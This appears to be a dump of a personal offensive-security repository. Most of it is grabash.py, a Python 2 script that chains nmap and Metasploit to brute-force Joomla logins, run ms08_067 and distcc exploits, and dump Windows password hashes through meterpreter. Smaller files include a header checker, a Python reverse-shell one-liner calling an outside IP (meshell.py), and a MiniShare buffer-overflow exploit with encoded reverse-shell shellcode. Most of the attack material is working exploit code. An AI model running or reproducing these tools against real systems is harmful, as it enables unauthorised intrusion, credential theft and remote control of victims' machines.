    saveNetRc('run\n') # TODO: python -c 'import pty;pty.spawn("/bin/bash")' # to get root
147 |
148 | # modules for SMB
def check_139(target):
    """Queue the SMB/NetBIOS scanner modules (no exploits) for target in the network RC file."""
    print ' + loading : current smb modules:'
    print ' + nbname'
    print ' + smb_enumshares'
    print ' + smb_enumusers_domain'
    print ' + smb_lookupsid'
    print ' + pipe_auditor'
    print ' + pipe_dcerpc_auditor'

    smb_scanners = (
        'auxiliary/scanner/netbios/nbname',
        'auxiliary/scanner/smb/smb_enumshares',
        'auxiliary/scanner/smb/smb_enumusers_domain',
        'auxiliary/scanner/smb/smb_lookupsid',
        'auxiliary/scanner/smb/pipe_auditor',
        'auxiliary/scanner/smb/pipe_dcerpc_auditor',
    )
    for module in smb_scanners:
        saveNetRc('use ' + module + '\n')
        saveNetRc('set RHOSTS ' + target + '\n')
        saveNetRc('run\n')
181 |
182 |
183 | # modules if HTTP found
def check_http(target, rport):
    """Queue the generic HTTP scanner modules for target:rport in the network RC file."""
    print ' + loading : http modules ...'
    print ' + http_header'
    print ' + dir_scanner'
    print ' + trace'
    print ' + options'
    print ' + robots_txt'
    print ' + scrapper (get Title)'

    # (module name, extra 'set' lines emitted between RHOSTS and RPORT)
    http_scanners = [
        ('http_header', []),
        ('dir_scanner', ['THREADS 10', 'DICTIONARY /usr/share/dirb/wordlists/common.txt']),
        ('trace', []),
        ('options', []),
        ('robots_txt', []),
        ('scraper', []),
    ]
    for name, extras in http_scanners:
        saveNetRc('use auxiliary/scanner/http/' + name + '\n')
        saveNetRc('set RHOSTS ' + target + '\n')
        for extra in extras:
            saveNetRc('set ' + extra + '\n')
        saveNetRc('set RPORT ' + rport + '\n')
        saveNetRc('run\n')
224 |
225 | # modules for Apache
def check_apache(target, rport):
    """Queue apache_userdir_enum for target:rport in the www RC file (2nd msfconsole run)."""
    print ' + loading : apache modules ...'
    print ' + apache_userdir_enum'
    rc_lines = [
        'use auxiliary/scanner/http/apache_userdir_enum',
        'set VERBOSE false',
        'set RHOSTS ' + target,
        'set RPORT ' + rport,
        'run',
    ]
    for rc_line in rc_lines:
        saveWWWRc(rc_line + '\n')
234 |
235 | # modules for IIS
def check_iis(target, rport):
    """Queue the WebDAV scanner for target:rport in the network RC file."""
    print ' + loading : iis modules ...'
    print ' + webdav_scanner'
    rc_lines = [
        'use auxiliary/scanner/http/webdav_scanner',
        'set RHOSTS ' + target,
        'set RPORT ' + rport,
        'run',
    ]
    for rc_line in rc_lines:
        saveNetRc(rc_line + '\n')
243 |
244 | # modules for Joomla
def check_joomla(target,rport, targeturi):
    """Queue the Joomla modules for target:rport in the www RC file.

    The ``targeturi`` argument is only printed and used in the first
    TARGETURI line; AUTH_URI, FORM_URI and the joomlash TARGETURI are
    hard-coded to /joomla2/ (see the TODOs).  joomlash is a custom module
    (link below), so the 2nd msfconsole run needs it installed.
    """
    print ' + loading : joomla modules, port : ', rport
    print ' + joomla_bruteforce'
    print ' + joomla_version'
    print ' + joomla_plugins'
    print ' + joomlash' # https://github.com/c610/modules/blob/master/joomlash.rb
    # TODO: finish joomla_upload_shell.rb
    # TODO: remember to properly set TARGETURI; see: dir_scanner

    print '\n'
    print '[i] Current TARGETURI to ' + str(targeturi) + '\n'
    saveWWWRc('use auxiliary/scanner/http/joomla_bruteforce_login\n')
    saveWWWRc('set TARGETURI + ' + targeturi + '\n') # TODO
    saveWWWRc('set RHOSTS ' + target + '\n')
    saveWWWRc('set RPORT ' + rport + '\n')
    saveWWWRc('set AUTH_URI /joomla2/administrator/index.php \n') # TODO: 3rd param tmpuri
    saveWWWRc('set PASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt\n')
    saveWWWRc('set VERBOSE false\n')
    saveWWWRc('set USERNAME admin\n')
    saveWWWRc('set FORM_URI /joomla2/administrator\n') # TODO
    saveWWWRc('set STOP_ON_SUCCESS true\n')
    saveWWWRc('run\n') # TODO: result (user:pass) to joomlash

    # the credentials below are fixed, not taken from the login run above
    saveWWWRc('use exploit/unix/webapp/joomlash\n')
    saveWWWRc('set RHOST ' + target + '\n')
    saveWWWRc('set RPORT ' + rport + '\n')
    saveWWWRc('set TARGETURI /joomla2/\n') # ' + targeturi + '\n') TODO!
    saveWWWRc('set USERNAME admin\n') #TODO : connect with joomla_bruteforce_login
    saveWWWRc('set PASSWORD admin\n')
    saveWWWRc('run\n')


    saveWWWRc('use auxiliary/scanner/http/joomla_version\n')
    saveWWWRc('set RHOSTS ' + target + '\n')
    saveWWWRc('set RPORT ' + rport + '\n')
    saveWWWRc('run\n')

    saveWWWRc('use auxiliary/scanner/http/joomla_plugins\n')
    saveWWWRc('set RHOSTS ' + target + '\n')
    saveWWWRc('set RPORT ' + rport + '\n')
    saveWWWRc('run\n')
286 |
287 | # modules for git
def check_git(target, rport):
    """Queue the exposed-.git scanner for target:rport in the network RC file."""
    print ' + loading : git modules ...'
    print ' + git_scanner'

    rc_lines = [
        'use auxiliary/scanner/http/git_scanner',
        'set RHOSTS ' + target,
        'set RPORT ' + rport,
        'run',
    ]
    for rc_line in rc_lines:
        saveNetRc(rc_line + '\n')
296 |
297 | # modules for Axis2 CTF
def check_axis2(target,rport):
    """Queue the custom axis2_lfi_ctf module for target:rport in the www RC file.

    The module is not part of a stock framework install (see the comment
    below); if it is missing the 2nd msfconsole run just fails to load it.
    """
    print ' + loading : axis2 modules...'
    print ' + axis2_lfi_ctf' # you need to add this module to default msf

    saveWWWRc('use auxiliary/scanner/http/axis2_lfi_ctf\n')
    saveWWWRc('set RHOSTS ' + target + '\n')
    saveWWWRc('set RPORT ' + rport + '\n')
    saveWWWRc('run\n')
306 |
307 | # test will start during 2nd msf run.
308 | # links found by dir_scanner are used here to define
309 | # tests for specific http server or webapp
310 | # TODO: more detailed tests...
def check_http_dirs(target):
    """Turn the 'Found http://...' lines of the 1st run's spool into www-RC entries.

    Reads rcspool (module-level path), and for every line containing
    'Found http://' picks a check_* function from the path fragment.  The
    port is parsed out of the URL itself so it can differ from the port
    readScan() saw.  The file handle is never closed explicitly.
    """
    fp = open(rcspool,'r') # read from msf.net output file
    lines = fp.readlines()


    print '[+] Please wait, I\'m reading output from ' + str(rcspool) + '\n'
    print '[+] Preparing HTTP attacks basing on found directories'
    for line in lines: # TODO
        if line.find('Found http://') != -1:

            # fix: set new rport
            # split on ':' -> [..., 'http', '//host', 'port/path ...']; the
            # third field up to the first '/' is the port
            newport = line.split(':')
            rrport = newport[2].split('/')[0] # new RPORT for all tests below

            # print("Setting new RPORT for this test: " + str(rrport)) # for debug
            if line.find('/administrator/') != -1:
                print ' [+] probably Joomla; preparing tests...'
                tmpuri = '/administrator/' # TODO change!
                check_joomla(target, rrport, tmpuri)

            elif line.find('/server-status') != -1:
                print ' [+] Found "/server-status"; probably Apache...'
                # TODO: we need a 'marker' to set apache tests already done (if any)
                check_apache(target,rrport)

            elif line.find('/axis2/') != -1: # prepared for CTF Axis2 by PentesterLab.com
                # TODO: link to writeup
                print ' [+] probably Axis2; preparing tests...'
                check_axis2(target,rrport)

            elif line.find('/joomla/') != -1:
                print ' [+] probably Joola; preparing tests...' # TODO: change tmpuri
                tmpuri = '/joomla/'
                check_joomla(target, rrport, tmpuri)

            elif line.find('/joomla2/') != -1:
                print ' [+] probably Joola; preparing tests...' # TODO: change targeturitmp
                tmpuri = '/joomla2/'
                # NOTE(review): this branch passes `targeturi`, which is never
                # assigned anywhere visible (readScan only declares it global),
                # so it raises NameError at runtime.
                check_joomla(target, rrport, targeturi)

            elif line.find('.git') != -1:
                print ' [+] probably git found; preparing tests...'
                check_git(target, rrport)
                # indentation is lost in this listing; the line appears to
                # belong to the .git branch -- confirm against the source
                tmpuri = '' # TODO clean
355 |
356 |
357 | # modules if HTTPS found
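def check_https(target, rport):
    """Queue the HTTPS/TLS scanner modules for target:rport in the network RC file.

    Fix: the http_hsts entry used to be written as 'use use auxiliary/...',
    which is not a valid module path; the four module paths are now built
    the same way.
    """
    print ' + loading : https modules ...'
    print ' + http_hsts'
    print ' + cert'
    print ' + ssl'
    print ' + ssl_version'

    for module in ('http_hsts', 'cert', 'ssl', 'ssl_version'):
        saveNetRc('use auxiliary/scanner/http/' + module + '\n')
        saveNetRc('set RHOSTS ' + target + '\n')
        saveNetRc('set RPORT ' + rport + '\n')
        saveNetRc('run\n')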
384 |
385 |
def check_445(target):
    """Queue ms08_067_netapi with a reverse meterpreter payload.

    LHOST comes from elhost(); makePost() is called first so the
    AutoRunScript resource file exists at path2post when msfconsole reads
    this RC.  EndOnSession makes the module return once a session opens.
    """
    print ' + loading : 445 modules ...'
    print ' + ms08_067_netapi'

    saveNetRc('use exploit/windows/smb/ms08_067_netapi\n')
    saveNetRc('set RHOST ' + target + '\n')
    saveNetRc('set PAYLOAD windows/meterpreter/reverse_tcp\n')
    saveNetRc('set EndOnSession true\n')
    saveNetRc('set LHOST ' + str(elhost()) + '\n')
    makePost(path2post)
    saveNetRc('set AutoRunScript multi_console_command -rc ' + path2post + '\n')
    saveNetRc('run\n')
398 |
399 | # modules for Oracle 9i ftp bug in PASS
def check_2100(target):
    """Queue the two Oracle 9i XDB FTP exploit modules (RHOST) in the network RC file."""
    print ' + loading : Oracle 9i modules'
    print ' + oracle9i_xdb_ftp_pass'
    print ' + oracle9i_xdb_ftp_unlock'
    saveNetRc('use exploit/windows/ftp/oracle9i_xdb_ftp_pass\n')
    saveNetRc('set RHOST ' + target + '\n')
    saveNetRc('run\n')

    saveNetRc('use exploit/windows/ftp/oracle9i_xdb_ftp_unlock\n')
    saveNetRc('set RHOST ' + target + '\n')
    saveNetRc('run\n')
411 |
412 |
413 | # modules for SSDP/UPnP
def check_2869(target):
    """Queue the two SSDP/UPnP scanners for target in the network RC file (same list as check_5357)."""
    print ' + loading : 2869 modules ...'
    print ' + ssdp_msearch'
    print ' + ssdp_amp'

    for module in ('ssdp_msearch', 'ssdp_amp'):
        saveNetRc('use auxiliary/scanner/upnp/' + module + '\n')
        saveNetRc('set RHOSTS ' + target + '\n')
        saveNetRc('run\n')
426 |
427 | # modules for DistCC Daemon
def check_3632(target):
    """Queue the distcc_exec exploit module with a bind payload (RHOST) in the network RC file."""
    print ' + loading : DistCC Daemon modules' # for Metasploitable
    print ' + distcc_exec'
    saveNetRc('use exploit/unix/misc/distcc_exec\n')
    saveNetRc('set RHOST ' + target + '\n')
    saveNetRc('set PAYLOAD cmd/unix/bind_perl\n')
    saveNetRc('run\n')
435 |
436 | # modules for SSDP/UPnP
def check_5357(target):
    """Queue the two SSDP/UPnP scanners for target in the network RC file (same list as check_2869)."""
    print ' + loading : 5357 modules ...'
    print ' + ssdp_msearch'
    print ' + ssdp_amp'

    for module in ('ssdp_msearch', 'ssdp_amp'):
        saveNetRc('use auxiliary/scanner/upnp/' + module + '\n')
        saveNetRc('set RHOSTS ' + target + '\n')
        saveNetRc('run\n')
449 |
450 |
451 | # code functions:
452 | # TODO: readSpool for output.www; more details; ...
453 | # ...20.08.and.some.changes...
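def thanks():
    """Print the end-of-run summary.

    Reads the nmap log (count of lines with 'open'), the network RC file
    (modules queued), the 1st run's spool ('Found http' links) and the 2nd
    run's spool (Joomla login result / shell marker) and prints what it
    finds.  Every file is read inside a ``with`` block so the handles are
    released (the original left two of them open).
    """
    # :)
    print '\n'
    print '*'*80
    print '\t\t(let\'s say...) summary:'
    print '*'*80
    print ' Scanned : ', today

    # summary for 1st msf
    print '-'*80
    print ' Summary for 1st output:\n'
    with open(nmaplogfile, 'r') as fp1:
        s_ports = fp1.readlines()

    # every nmap line mentioning 'open' counts as one port
    foundOpen = sum(1 for oport in s_ports if oport.find('open') != -1)

    with open(rcfile, 'r') as fp:  # read all 'use '
        used = fp.readlines()

    print '[+] Ports:'
    print ' Total ports : ', foundOpen

    countScanned = 0
    for u in used:
        if u.find('use ') != -1:
            countScanned += 1
            nu = u.split(' ')[1]
            print ' - test used : ' + str(nu)

    print ' Modules prepared : ', countScanned

    print '\n'

    # summary for 2nd msf
    print '-'*80
    print ' Summary for 2nd output:\n' # TODO

    # the 1st run's spool is read here (not wwwspool); looking for 'Found http' links
    with open(rcspool, 'r') as fp2:
        links = fp2.readlines()

    for link in links:
        if link.find('Found http') != -1:
            nlink = link.split(' ')
            codelink = nlink[3]
            gotlink = nlink[2]
            print 'Code ' + str(codelink) + ' for : ', str(gotlink)

    print '\n'


    print '\nNow we will check 2nd file: ' + str(wwwspool) + '\n'

    with open(wwwspool, 'r') as readWWW:
        lines = readWWW.readlines()

    for line in lines:
        if line.find(target) != -1: # TODO : fix this ififififif;[
            # split on quotes: "Successful login 'admin' : 'pass'" -> fields 1 and 3
            if line.find("Successful login 'admin'") != -1:
                splitl = line.split("'")
                print ' Joomla user : ' + str(splitl[1])
                print ' Joomla pass : ' + str(splitl[3])

            if line.find('templates/beez3/error.php?x=cmd') != -1:
                print ' [+] It seems to we already have a shell :)\n'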
529 |
530 |
531 | # for LHOST
def elhost():
    """Return the IPv4 address of eth0 as printed by ifconfig, via a shell pipeline.

    The interface name and the ifconfig output format are hard-coded, so
    the result is empty on hosts without an 'eth0' or with the newer
    ifconfig layout.  The value is returned as read, most likely including
    the pipeline's trailing newline; callers splice it into 'set LHOST'
    lines unchanged.
    """
    f = os.popen('/sbin/ifconfig eth0 | grep "inet\ addr" | cut -d: -f2 | cut -d" " -f1')
    lhost=f.read()
    return lhost
536 |
537 | # RC for meterpreter; now prepared as poc for ms08_067_netapi module (check_445)
def makePost(postme):
    """Write the meterpreter resource script that check_445 passes as AutoRunScript.

    NOTE(review): the ``postme`` argument is ignored; the file is always
    written to the module-level path2post ('w' mode, so it is overwritten
    each time).  The handle is not closed explicitly.
    """
    fp = open(path2post,'w')

    fp.write('sysinfo\n')
    fp.write('run post/windows/gather/hashdump\n')
    fp.write('exit\n')
    fp.write('exit\n')
    fp.write('exit\n') # TODO: make-meterpreter-exit bug
546 |
547 |
548 | # reading loglines from output.www spool
549 | # TODO: grab details to exploit bugs and/or prepare summary
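def readSpoolWWW(RCfp):
    """Print every line of the spool file RCfp that contains 'admin'.

    The file is read inside a ``with`` block so the handle is closed even
    if reading fails; a missing file still raises IOError to the caller.
    """
    print '[+] Reading spool from : ', RCfp
    # TODO: tmp solution...
    with open(RCfp) as fp:
        for line in fp:
            if line.find('admin') != -1:
                print line

    print '[+] Finished reading spool from : ', RCfp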
562 |
563 | # read loglines from output.msf spool
564 | # TODO: grab details to exploit bugs and/or prepare summary
def readSpoolNet(RCfp):
    """Process the 1st run's spool: prints banners and delegates to check_http_dirs().

    ``RCfp`` is only printed; check_http_dirs() reads the module-level
    rcspool path itself.
    """
    print '[+] Reading spool from : ', RCfp

    check_http_dirs(target)

    print '[+] Finished reading spool from : ', RCfp
571 |
572 | # run msfconsole with defined RC file
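def runMsfScan(RCfp):
    """Run msfconsole on the resource file RCfp and block until it exits.

    The command is passed as an argument list (no shell), so a path with
    spaces or shell metacharacters reaches msfconsole verbatim instead of
    being word-split.  The exit status is not checked.
    """
    print '[i] Starting Metasploit with RC file : ', RCfp
    subprocess.call(['msfconsole', '-r', RCfp])
    print '[+] Finished Metasploit tests for : ', RCfp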
578 |
579 | # save line to RC file for 2nd msf run (www tests)
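def saveWWWRc(line):
    """Append one line (caller supplies the newline) to the www RC file rcwww.

    The handle is closed by the ``with`` block, so the line is flushed before
    the next call; the original relied on garbage collection to close it.
    """
    with open(rcwww, 'a+') as fp:
        fp.write(line)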
583 |
584 | # save line to RC file for 1st msf run
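def saveNetRc(line):
    """Append one line (caller supplies the newline) to the network RC file rcfile.

    The handle is closed by the ``with`` block, so the line is flushed before
    the next call; the original relied on garbage collection to close it.
    """
    with open(rcfile, 'a+') as fp:
        fp.write(line)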
588 |
589 | # read nmap output file
590 | # TODO: grab details from nmap log
def readScan(nmaplogfile):
    """Translate the nmap log into 'use/set/run' entries for the two RC files.

    Every line containing 'open' is matched with substring checks against
    the port/service patterns below and the matching check_* function
    appends its modules; both RC files end with an 'exit' line.

    The parameter shadows the module-level name nmaplogfile.  rport,
    targeturi and tmpuri are declared global here; rport is what the
    check_* calls receive and is reset to '' at the end, targeturi is
    never assigned anywhere visible.  The file handle is never closed
    explicitly.
    """
    print '[+] Reading scan log...'

    fp = open(nmaplogfile,'r')
    ports = fp.readlines()

    for port in ports:
        if port.find('open') != -1:
            tmp_port = port.split('/')
            global rport
            global targeturi # TODO !
            global tmpuri
            # text before the first '/', i.e. the port number when the line
            # starts with 'NNN/tcp'; -vv 'Discovered open port' lines would
            # yield the whole prefix instead
            rport = tmp_port[0]

            # all matches are substring tests: '21/tcp' also matches
            # '2121/tcp', '22/tcp' also matches '2022/tcp'
            if port.find('21/tcp') != -1:
                # NOTE(review): scannedPort is assigned here but never
                # initialised in this function (nor declared global), so
                # this line raises UnboundLocalError the first time it runs.
                scannedPort += 1
                print '[i] FTP found on port : ', rport
                check_21(target)
                if port.find('Microsoft ftpd') != -1:
                    print '[i] Probably Microsoft FTP; preparing...'
                    check_21_ms(target)

            elif port.find('22/tcp') != -1:
                print '[i] SSH found on port :', rport
                check_22(target)

            # checked before the numeric branches below, so a 443 line whose
            # service column contains 'http' (e.g. ssl/http) would likely
            # land here rather than in the 443 branch -- confirm against
            # real nmap output
            elif port.find('http') != -1:
                print '[i] HTTP found on port: ', rport
                check_http(target, rport) # test for all http
                if port.find('Apache') != -1:
                    print '[i] Probably Apache; preparing...'
                    check_apache(target, rport)
                elif port.find('IIS') != -1:
                    print '[i] Probably IIS; preparing...'
                    check_iis(target, rport)

            elif port.find('111/tcp') != -1:
                print '[i] RPC found on port : ', rport
                check_111(target)

            elif port.find('135/tcp') != -1:
                print '[i] NetBios found on port: ', rport
                check_135(target)

            elif port.find('139/tcp') != -1:
                print '[i] SMB found on port: ', rport
                if port.find('Samba smbd') != -1:
                    print '[i] Probably Linux Samba; preparing...'
                    check_139_lin(target)
                # indentation is lost in this listing; check_139 appears to
                # run for every 139/tcp line -- confirm against the source
                check_139(target)

            elif port.find('443/tcp') != -1:
                print '[i] HTTPS found on port: ', rport
                check_https(target, rport)


            elif port.find('445/tcp') != -1:
                print '[i] MS-DC Active Directory found on port: ', rport
                check_445(target)

            elif port.find('2100/tcp') != -1:
                print '[i] Oracle found on port: ', rport
                check_2100(target)

            elif port.find('2869/tcp') != -1:
                print '[i] SSDP/UPnP found on port: ', rport
                check_2869(target)

            elif port.find('3632/tcp') != -1:
                print '[i] DistCC Daemon found on port: ', rport
                check_3632(target)

            elif port.find('5357/tcp') != -1:
                print '[i] SSDP/UPnP found on port: ', rport
                check_5357(target)

    # terminate both RC files so msfconsole exits after the last module
    saveNetRc('exit\n')
    saveWWWRc('exit\n')
    rport = ''
    print '\n[i] Reading log file : done.'
671 |
672 | # run nmap against IP and save output to nmap log
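def scan(target):
    """Run the nmap service/version scan against target and write the normal-format log to nmaplogfile.

    The command is passed as an argument list (no shell): the target and
    the log path are handed to nmap verbatim, so a working directory with
    spaces or a target containing shell metacharacters no longer breaks
    the command line.  The exit status is not checked.
    """
    print '[+] Scanning :', target

    exe = ['nmap', '-sV', '-T4', '-A', '-Pn', '-vv', '-n', target, '-oN', nmaplogfile]
    print '[+] Started!'
    subprocess.call(exe)
    print '[+] Finished.'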
680 |
681 | # check for current RC, if any, move to .old
682 | def moveRc(fp):
683 | moveme = 'mv ' + str(fp) + ' ' + str(fp) + '.old'
684 | subprocess.call([ moveme], shell=True)
685 |
686 | # prepare environment; dirs, logs, etc...
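def prepareEnv():
    """Create the log directories and start fresh RC files for both msfconsole runs.

    Existing RC files are renamed to '.old' via moveRc(); each new RC file
    gets a leading 'spool <file>' line so msfconsole logs its output.

    Fix: the original tested ``os.path.isdir(x) != -1`` / ``isfile(x) != -1``,
    which is always true for a bool, and relied on the except branch to
    notice an existing directory; the existence checks are explicit now
    and the RC handles are closed after the write.
    """
    print '[+] Preparing environment...'

    # look for old RC files
    if os.path.exists(rcfile):
        print '[!] Old RC file found; moving...'
        moveRc(rcfile)

    if os.path.exists(rcwww):
        print '[!] Old WWW RC file found; moving...'
        moveRc(rcwww)

    # create log dirs
    print '[i] Checking for log directory : ' + allLogs
    _mkLogDir(allLogs,
              '[+] Log directory created : ' + allLogs,
              '[+] Log directory is already there')

    print '[i] Checking target directory: ' + tLogDir
    _mkLogDir(tLogDir,
              '[+] Directory for target should be here: ' + tLogDir,
              '[+] Log directory for target is already created.')

    # preparing RC files (1st line 'spool' to log outputs)
    print '[i] Preparing RC files: '
    _startRc(rcfile, rcspool, '[+] Network RC file created at : ' + rcfile)
    _startRc(rcwww, wwwspool, '[+] HTTP RC file created at : ' + rcwww)


def _mkLogDir(path, created_msg, exists_msg):
    """Create directory path unless it exists; a failed mkdir is printed, not raised."""
    if os.path.isdir(path):
        print exists_msg
        return
    try:
        os.mkdir(path)
        print created_msg
    except OSError as e:
        print e


def _startRc(rcpath, spoolpath, okmsg):
    """Append 'spool <spoolpath>' to rcpath and close it; I/O errors are printed, not raised."""
    try:
        with open(rcpath, 'a+') as fp:
            fp.write('spool ' + spoolpath + '\n')
        print okmsg
    except (OSError, IOError) as e:
        print e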
736 |
737 | # welcome msg + date
738 | # TODO: date to log/summary
def sayHi():
    """Print the start banner followed by the module-level start timestamp ``today``."""
    rule = '*' * 80
    for banner_line in ('', rule, '\t\t\t\tgrabash.py', rule, ''):
        print banner_line
    print '[i] Test started : ', today
746 |
747 |
748 | # MAIN starter:
749 | # ...
sayHi()                 # banner + timestamp
prepareEnv()            # log dirs; old RC files renamed to .old; fresh RC files with 'spool' lines
scan(target)            # nmap -> nmaplogfile

readScan(nmaplogfile)   # nmap log -> 1st RC file (network modules)
runMsfScan(rcfile)      # 1st msfconsole run; output spooled to rcspool
readSpoolNet(rcspool)   # 'Found http://' lines -> 2nd RC file (www modules)

runMsfScan(rcwww)       # 2nd msfconsole run; output spooled to wwwspool
# readSpoolWWW(rcspool) # print all output.www

thanks() # TODO: detailed summary
762 | #
763 | # more:
764 | # http://code610.blogspot.com
765 | #
766 | # cheers :)
767 |
768 |
769 |
--------------------------------------------------------------------------------
/greenshot--1.2.9.129-EXPLOITABLE.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/greenshot--1.2.9.129-EXPLOITABLE.zip
--------------------------------------------------------------------------------
/headHunter.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # headHunter.py - small script to check few headers for
3 | # buggy server configuration.
4 | # @22.10.2016
5 | # based on 'python web penetration testing cookbook'
6 | #
7 | import requests
8 | import sys
9 |
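GREEN = '\033[92m'
YELLOW = '\033[93m'
ENDC = '\033[0m'
RED = '\033[31m'

# Values the two "must be set exactly" headers are compared against.
# NOTE(review): '1; mode=block' is what this script expects; current browser
# guidance treats X-XSS-Protection as legacy (a CSP does the job), so a
# missing or different value is worth reporting but is not a hard finding.
XSS_EXPECTED = '1; mode=block'
CTO_EXPECTED = 'nosniff'


def bug(msg):
    """Print a red ' [bug] ...' line."""
    print(RED + ' [bug] ' + msg + ENDC)


def info(msg):
    """Print a yellow ' [info] ...' line."""
    print(YELLOW + ' [info] ' + msg + ENDC)


target = str(sys.argv[1])   # IndexError when no URL is given
print('\n\t ( headHunter.py - find buggy headers )\n')

print('[+] Checking : ' + GREEN + target + ENDC + '\n')

# a timeout so an unresponsive host does not hang the check forever
req = requests.get(target, timeout=10)
hdrs = req.headers   # case-insensitive mapping; .get() replaces the bare try/except KeyError blocks

xssprotect = hdrs.get('X-XSS-Protection')
if xssprotect is None:
    bug('X-XSS-Protection not set, XSS may be possible')
elif xssprotect != XSS_EXPECTED:
    bug('X-XSS-Protection not set properly, XSS may be possible: ' + xssprotect)

contenttype = hdrs.get('X-Content-Type-Options')
if contenttype is None:
    bug('X-Content-Type-Options not set')
elif contenttype != CTO_EXPECTED:
    bug('X-Content-Type-Options not set properly: ' + contenttype)

hsts = hdrs.get('Strict-Transport-Security')
if hsts is None:
    bug('HSTS header not set, MITM attacks may be possible')
else:
    info('Strict-Transport-Security set: ' + hsts)

csp = hdrs.get('Content-Security-Policy')
if csp is None:
    bug('Content-Security-Policy missing')
else:
    info('Content-Security-Policy set:' + csp)

srv = hdrs.get('Server')
if srv is None:
    info('Server header not found')
else:
    info('Server set:' + srv)

dat = hdrs.get('Date')
if dat is not None:
    info('Date set: ' + dat)

crossdomain = hdrs.get('Access-Control-Allow-Origin')
if crossdomain is None:
    info('Access-Control-Allow-Origin missing')
elif crossdomain.strip() == '*':
    # a wildcard lets any origin read the response; a finding unless the content is public
    bug("Access-Control-Allow-Origin is '*' - any origin may read this response")
else:
    info('Access-Control-Allow-Origin set:' + crossdomain)

xcsp = hdrs.get('X-Content-Security-Policy')
if xcsp is None:
    info('X-Content-Security-Policy missing')
else:
    # legacy per-document policy header that pre-dates Content-Security-Policy
    info('X-Content-Security-Policy set:' + xcsp)

# Fix: the original never read this header (its try body only printed), so
# X-Frame-Options was always reported as present.
xfo = hdrs.get('X-Frame-Options')
if xfo is None:
    bug('X-Frame-Options missing - clickjacking possible')
else:
    info('X-Frame-Options set: ' + xfo + ', clickjacking not likely possible')


# TODO: add more headers...
print('\n[+] Test finished.\n')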
81 |
82 |
83 |
--------------------------------------------------------------------------------
/ispsoft-01-0x5b1061e7.0xaf639cc8.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/ispsoft-01-0x5b1061e7.0xaf639cc8.zip
--------------------------------------------------------------------------------
/ispsoft-02-0x5b1061e7.0x630e8926.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/ispsoft-02-0x5b1061e7.0x630e8926.zip
--------------------------------------------------------------------------------
/meshell.py:
--------------------------------------------------------------------------------
1 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.111.185.17",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
--------------------------------------------------------------------------------
/mini-poc.py:
--------------------------------------------------------------------------------
1 | c@kali:~/src/$ cat minishare141-win7ultip0c-2.py
2 | #!/usr/bin/env python
3 | import sys, socket
4 |
5 | target = sys.argv[1]
6 | port = 80
7 |
8 | print '[+] checking:', target
9 |
10 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
11 | s.connect((target, port))
12 | #shellcode = ""
13 |
14 | buffer = "GET "
15 | padding = "A" * 1787 # [*] Exact match at offset 1787
16 | ret_addr = "\x71\xe8\x58\x77" # search for jmpesp in modules
17 | nopsss = "\x90" * 26
18 |
19 | # c@kali:~/src/oscp$ msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.183
20 | # LPORT=4444 -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
21 | # x86/shikata_ga_nai chosen with final size 360
22 | # Payload size: 360 bytes
23 | shellcode = ""
24 | shellcode += "\xd9\xc5\xbd\x4d\x99\xdc\x16\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
25 | shellcode += "\x54\x83\xea\xfc\x31\x6a\x14\x03\x6a\x59\x7b\x29\xea\x89\xf9"
26 | shellcode += "\xd2\x13\x49\x9e\x5b\xf6\x78\x9e\x38\x72\x2a\x2e\x4a\xd6\xc6"
27 | shellcode += "\xc5\x1e\xc3\x5d\xab\xb6\xe4\xd6\x06\xe1\xcb\xe7\x3b\xd1\x4a"
28 | shellcode += "\x6b\x46\x06\xad\x52\x89\x5b\xac\x93\xf4\x96\xfc\x4c\x72\x04"
29 | shellcode += "\x11\xf9\xce\x95\x9a\xb1\xdf\x9d\x7f\x01\xe1\x8c\xd1\x1a\xb8"
30 | shellcode += "\x0e\xd3\xcf\xb0\x06\xcb\x0c\xfc\xd1\x60\xe6\x8a\xe3\xa0\x37"
31 | shellcode += "\x72\x4f\x8d\xf8\x81\x91\xc9\x3e\x7a\xe4\x23\x3d\x07\xff\xf7"
32 | shellcode += "\x3c\xd3\x8a\xe3\xe6\x90\x2d\xc8\x17\x74\xab\x9b\x1b\x31\xbf"
33 | shellcode += "\xc4\x3f\xc4\x6c\x7f\x3b\x4d\x93\x50\xca\x15\xb0\x74\x97\xce"
34 | shellcode += "\xd9\x2d\x7d\xa0\xe6\x2e\xde\x1d\x43\x24\xf2\x4a\xfe\x67\x9a"
35 | shellcode += "\xbf\x33\x98\x5a\xa8\x44\xeb\x68\x77\xff\x63\xc0\xf0\xd9\x74"
36 | shellcode += "\x27\x2b\x9d\xeb\xd6\xd4\xde\x22\x1c\x80\x8e\x5c\xb5\xa9\x44"
37 | shellcode += "\x9d\x3a\x7c\xf0\x97\xac\xbf\xad\xa9\x9b\x28\xac\xa9\xf2\xf4"
38 | shellcode += "\x39\x4f\xa4\x54\x6a\xc0\x04\x05\xca\xb0\xec\x4f\xc5\xef\x0c"
39 | shellcode += "\x70\x0f\x98\xa6\x9f\xe6\xf0\x5e\x39\xa3\x8b\xff\xc6\x79\xf6"
40 | shellcode += "\x3f\x4c\x88\x06\xf1\xa5\xf9\x14\xe5\xd7\x01\xe5\xf5\x7d\x02"
41 | shellcode += "\x8f\xf1\xd7\x55\x27\xfb\x0e\x91\xe8\x04\x65\xa1\xef\xfa\xf8"
42 | shellcode += "\x90\x84\xcc\x6e\x9d\xf2\x30\x7f\x1d\x03\x66\x15\x1d\x6b\xde"
43 | shellcode += "\x4d\x4e\x8e\x21\x58\xe2\x03\xb7\x63\x53\xf7\x10\x0c\x59\x2e"
44 | shellcode += "\x56\x93\xa2\x05\xe5\xd4\x5d\xdb\xcb\x7c\x36\x23\x4b\x7d\xc6"
